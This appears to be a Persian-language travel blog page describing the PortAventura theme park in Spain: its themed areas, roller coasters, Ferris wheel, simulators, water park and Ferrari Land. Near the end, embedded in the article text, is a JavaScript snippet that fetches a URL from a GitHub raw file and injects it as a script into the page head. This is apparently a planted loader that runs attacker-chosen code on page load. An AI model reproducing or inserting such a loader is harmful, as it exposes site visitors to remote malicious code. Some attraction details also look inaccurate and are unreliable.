پورت اوِنتورا: کوستا دورادا، اسپانیا

  • شهربازی پورت اوِنتورا یکی از بزرگترین و معروف‌ترین شهربازی‌های اسپانیا و اروپا است که در منطقه‌ی ساحلی کوستا دورادا واقع شده است. این شهربازی شامل 6 منطقه‌ی موضوعی است که هر کدام با الهام از یک فرهنگ یا قاره‌ی مختلف طراحی شده‌اند. این مناطق عبارتند از: مدیترانه، پلینزی، چین، مکزیک، غرب دور و سسامو. هر منطقه دارای جاذبه‌ها، نمایش‌ها، رستوران‌ها و فروشگاه‌های خاص خود است. شهربازی پورت اونتورا همچنین دارای ترن‌هوایی‌های هیجان‌انگیزی است که برخی از آن‌ها رکوردهای جهانی را در ارتفاع، سرعت و حلقه دارند. برخی از معروف‌ترین ترن‌هوایی‌های این شهربازی عبارتند از: دراگون خان، فوریوس باکو، شامبالا و رد فورس. شهربازی پورت اونتورا همچنین دارای پارک آبی و پارک فراری خود است که می‌توانید در آن‌ها لذت ببرید. این شهربازی بهشت دوستداران هیجان و ماجراجویی است و می‌توانید در آن خاطراتی فراموش نشدنی بسازید

    این شهربازی دارای وسایل بازی متنوع و هیجان‌انگیزی است که برخی از آن‌ها را می‌توانید در زیر ببینید:

    ترن‌هوایی‌ها: این شهربازی دارای چندین ترن‌هوایی با رکوردهای جهانی است که برای دوستداران سرعت و ادرنالین مناسب هستند. برخی از معروف‌ترین ترن‌هوایی‌های این شهربازی عبارتند از: دراگون خان، فوریوس باکو، شامبالا و رد فورس.

    پورت اوِنتورا

    چرخ و فلک: شهربازی پورت اوِنتورا دارای یک چرخ و فلک بزرگ و زیبا است که از بالای آن می‌توانید منظره‌ی شگفت‌انگیز شهربازی و دریا را مشاهده کنید. این چرخ و فلک در شب با نورهای رنگی تزئین شده و جلوه‌ی خاصی به شهربازی می‌دهد.

    شبیه‌سازها: این شهربازی دارای چندین شبیه‌ساز با فناوری پیشرفته است که می‌توانید در آن‌ها تجربه‌های متفاوتی را امتحان کنید. برخی از شبیه‌سازهای این شهربازی عبارتند از: آنگری بردز، سیمپسونز، آیس ایج و سیسمو.

    پارک آبی: این شهربازی دارای یک پارک آبی با وسایل بازی آبی متنوع و سرگرم‌کننده است که برای روزهای گرم تابستان مناسب هستند. در این پارک آبی می‌توانید از سرسره‌های آبی، استخرهای موج، رودخانه‌های مصنوعی و غیره لذت ببرید.

    پارک فراری: این شهربازی دارای یک پارک مخصوص علاقه‌مندان به ماشین‌های فراری است که در آن می‌توانید از وسایل بازی مرتبط با این برند معروف استفاده کنید. در این پارک فراری می‌توانید از ترن‌هوایی‌های سریع، شبیه‌سازهای مسابقه، موزه‌های نمایشی و غیره دیدن کنید

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید